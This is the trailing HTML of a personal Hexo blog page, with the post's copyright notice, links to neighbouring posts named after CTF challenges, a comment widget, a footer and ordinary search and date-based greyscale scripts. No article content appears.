</div></section><ul class="post-copyright"><li class="post-copyright-author"><strong>Post author: </strong>kinsey</li><li class="post-copyright-link"><strong>Post link: </strong><a href="https://kinseyy.github.io/2024/07/26/%E6%AD%A6%E5%8A%9F%E8%AE%BA%E5%89%91/" title="武功论剑">https://kinseyy.github.io/2024/07/26/%E6%AD%A6%E5%8A%9F%E8%AE%BA%E5%89%91/</a></li><li class="post-copyright-license"><strong>Copyright Notice: </strong>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><span class="icon iconify" data-icon="ri:creative-commons-line"></span><span class="icon iconify" data-icon="ri:creative-commons-by-line"></span><span class="icon iconify" data-icon="ri:creative-commons-nc-line"></span><span class="icon iconify" data-icon="ri:creative-commons-sa-line"></span></a> unless otherwise stated.</li></ul></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/2024/07/30/%E7%BE%8A%E5%9F%8E%E6%9D%AF2020-easyphp/" rel="prev" title="[羊城杯2020]easyphp"><span class="icon iconify" data-icon="ri:arrow-left-s-line"></span><span class="post-nav-text">[羊城杯2020]easyphp</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/2024/07/25/ISITDTU-2019-EasyPHP/" rel="next" title="[ISITDTU 2019]EasyPHP"><span class="post-nav-text">[ISITDTU 2019]EasyPHP</span><span class="icon iconify" data-icon="ri:arrow-right-s-line"></span></a></div></div></div><div class="hty-card" id="comment"><div class="comment-tooltip text-center"><span>如果您有任何关于博客内容的相关讨论，欢迎前往 <a href="https://github.com/kinseyy/kinseyy.github.io/discussions" target="_blank">GitHub Discussions</a> 与我交流。</span><br></div><div id="waline"></div><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/@waline/client@v2/dist/waline.css"><script>window.CONFIG.waline.config.path = "/2024/07/26/%E6%AD%A6%E5%8A%9F%E8%AE%BA%E5%89%91/"</script><div class="js-Pjax"><script src="/js/comments/waline.js" type="module" defer></script></div></div></main><footer class="sidebar-translate" id="footer"><div class="beian"><a rel="noopener" href="https://beian.miit.gov.cn/" target="_blank">苏ICP备17038157号</a></div><div class="copyright"><span>&copy; 2023 – 2025 </span><a class="with-love" id="animate" target="_blank" rel="noopener" href="https://github.com/kinseyy" title="Github"><span class="icon iconify" data-icon="ri:github-line"></span></a><span class="author"> kinsey</span></div><div class="powered"><span>Powered by <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> v7.2.0</span><span class="footer-separator">|</span><span>Theme - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v1.10.11</span></div><div class="footer-custom-text"><a href="https://www.travellings.cn/go.html" target="_blank" rel="noopener" title="开往-友链接力"><img src="https://www.travellings.cn/assets/logo.gif" alt="开往-友链接力" width="120"></a></div></footer></div><a class="hty-icon-button" id="back-to-top" aria-label="back-to-top" href="#"><span class="icon iconify" data-icon="ri:arrow-up-s-line"></span><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#0078E7" stroke-width="2" stroke-linecap="round"></circle></svg></a><a class="popup-trigger hty-icon-button icon-search" id="search" href="javascript:;" title="Search"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:search-line"></span></span></a><script>window.addEventListener("DOMContentLoaded", () => {
  // Handle and trigger popup window
  document.querySelector(".popup-trigger").addEventListener("click", () => {
    document.querySelector(".popup").classList.add("show");
    setTimeout(() => {
      document.querySelector(".search-input").focus();
    }, 100);
  });

  // Monitor main search box
  const onPopupClose = () => {
    document.querySelector(".popup").classList.remove("show");
  };

  document.querySelector(".popup-btn-close").addEventListener("click", () => {
    onPopupClose();
  });

  window.addEventListener("keyup", event => {
    if (event.key === "Escape") {
      onPopupClose();
    }
  });
});
</script><script defer src="https://fastly.jsdelivr.net/npm/algoliasearch@4/dist/algoliasearch-lite.umd.js"></script><script defer src="https://fastly.jsdelivr.net/npm/instantsearch.js@4/dist/instantsearch.production.min.js"></script><script defer src="/js/search/algolia-search.js" type="module"></script><div class="popup search-popup"><div class="search-header"><span class="popup-btn-close close-icon hty-icon-button"><span class="icon iconify" data-icon="ri:close-line"></span></span></div><div class="search-input-container"></div><div class="algolia-results"><div id="algolia-stats"></div><div id="algolia-hits"></div><div class="algolia-pagination" id="algolia-pagination"></div></div></div><script>function initMourn() {
  const date = new Date();
  const today = (date.getMonth() + 1) + "-" + date.getDate()
  const mourn_days = ["4-4","9-18"]
  if (mourn_days.includes(today)) {
    document.documentElement.style.filter = "grayscale(1)";
  }
}
initMourn();</script></body></html>